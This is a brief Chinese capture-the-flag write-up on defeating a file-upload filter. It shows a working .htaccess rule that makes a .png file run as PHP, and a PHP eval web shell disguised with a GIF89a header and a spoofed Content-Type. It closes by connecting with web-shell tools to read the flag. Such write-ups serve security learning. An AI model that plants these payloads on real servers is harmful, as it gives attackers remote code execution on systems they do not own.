0x00 知识点
- .htaccess文件上传绕过
0x01 知识点详解
- 请参考我上一篇学习笔记
0x02 解题思路
一看就知道是上传,尝试php3,phtml,普通一句话木马改后缀也不行,而且是添加了对文件的检测。- 继续尝试利用
.htaccess文件上传,首先上传一个.htaccess文件
<FilesMatch "flag.png">SetHandler application/x-httpd-php
</FilesMatch>
这里注意,这道题不知道为什么,我这里只有用将一句话木马后缀改成png的时候才能用菜刀之类的连上,jpg后缀都不行。这里抓包上传的时候要注意修改Content-Type: image/jpeg
上传成功后,会返回上传的路径
之后上传flag.png文件,由于文件内容会过滤<?所以
就用js引用php绕过。
GIF89a
<script language='php'>eval($_POST[cmd]);</script>
同样上传抓包,将Content-Type修改为Content-Type: image/jpeg
访问一下,发现访问成功,直接用蚁剑连接,flag在根目录里
